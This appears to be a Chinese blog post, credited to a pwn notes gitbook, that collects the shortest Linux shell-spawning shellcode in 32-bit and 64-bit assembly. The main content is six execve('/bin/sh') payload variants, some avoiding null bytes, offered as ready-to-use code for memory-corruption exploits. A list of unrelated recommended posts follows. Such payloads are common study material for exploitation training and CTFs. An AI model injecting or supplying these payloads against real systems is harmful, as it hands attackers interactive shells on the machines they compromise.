在寄存器都是非理想值情况下(shellcode可根据环境具体触发时寄存器的值做长度调整),我本着最优通用的原则,整理了Linux下32位和64位最短通用shellcode的编写。

32位

有"\x00"最短 20 byte

xor ecx,ecx

mul ecx

mov al,0xb

push 0x68732f

push 0x6e69622f

mov ebx,esp

int 0x80

无"\x00"最短 21 byte

xor ecx,ecx

mul ecx

push eax

mov al,0xb

push 0x68732f2f

push 0x6e69622f

mov ebx,esp

int 0x80

标准shellcode 23 byte

xor ecx,ecx

xor edx,edx

push edx

push 0x68732f2f

push 0x6e69622f

mov ebx,esp

xor eax,eax

mov al,0xB

int 0x80

64位

最短有"\x00" 22 byte
xor rsi,rsi

mul esi

mov rbx,0x68732f6e69622f

push rbx

push rsp

pop rdi

mov al, 59

syscall

最短无"\x00" 23 byte

xor rsi,rsi

mul esi

push rax

mov rbx,0x68732f2f6e69622f

push rbx

push rsp

pop rdi

mov al, 59

syscall

标准shellcode 31 byte

xor    rdi,rdi

xor    rsi,rsi

xor    rdx,rdx

xor    rax,rax

push   rax

mov rbx,0x68732f2f6e69622f

push   rbx

mov    rdi,rsp

mov    al,0x3b

syscall

上述内容全部来源于:https://b0ldfrev.gitbook.io/note/pwn/linux_shellcode

我只是知识的搬运工,侵删!

Linux_ShellCode总结的更多相关文章

随机推荐

  1. [hdu6582]Path

    首先,从1和n跑一次dij,判断每一条边能否出现在最短路上,不能出现就删掉,然后将所有边建在图上,流量为边权,跑最小割即可. 1 #include<bits/stdc++.h> 2 usi ...

  2. [loj2135]幻想乡战略游戏

    以1为根建树,令$D_{i}$为$i$子树内所有节点$d_{i}$之和 令$ans_{i}$为节点$i$的答案,令$fa$为$i$的父亲,则$ans_{i}=ans_{fa}+dis(i,fa)(D_ ...

  3. [bzoj4650]优秀的拆分

    由于字符串是AABB的形式,枚举AA和BB中间的位置,分别考虑AA和BB的数量,乘起来sigma一下即为答案以下考虑AA的情况(BB同理),枚举A的长度,然后按照这个长度分为若干块,那么每一个A一定可 ...

  4. [bzoj2257]瓶子和燃料

    先考虑选出k个后答案最小会是多少,容易发现其实就是所有的gcd(就是$ax+by=gcd(a,b)$的推广)然后相当于要最大化gcd,反过来可以将所有数的约数都打上+1标记,+1标记不少于k个且最大的 ...

  5. vip视频解析保存

    无广告通用:https://vip.52jiexi.top/?url= 腾讯直解 无广告解析:https://jx.lfeifei.cn/?url= 无广告解析:https://api.steak51 ...

  6. spring中使用@value注入static静态变量

    @Value("${meeting.private_key}")public static String PRIVATE_KEY;发现没有数据,null 分析 Spring是不能直 ...

  7. Timer定时器的使用

    import java.util.Timer; import java.util.TimerTask; public class Demo2 { //执行时间,时间单位为毫秒,读者可自行设定,不得小于 ...

  8. Yii自定义全局异常,接管系统异常

    Yii自定义全局异常,接管系统异常 一般自己的框架都会使用一些自己封装的全局异常,那么在系统发生异常突发情况时候,即可自主的做一些异常机制处理,例如发送短信.发送邮件通知系统维护人员或者以更加友好的方 ...

  9. Python编译工具Anaconda(含有spyder+jupyter)

    Anaconda的下载和安装 官方的下载地址:https://www.anaconda.com/distribution/ 安装程序为一个可执行程序文件,下载完成后双击执行程序即可完成安装.安装过程一 ...

  10. shell编程100列

    1.编写hello world脚本 #!/bin/bash# 编写hello world脚本 echo "Hello World!"2.通过位置变量创建 Linux 系统账户及密码 ...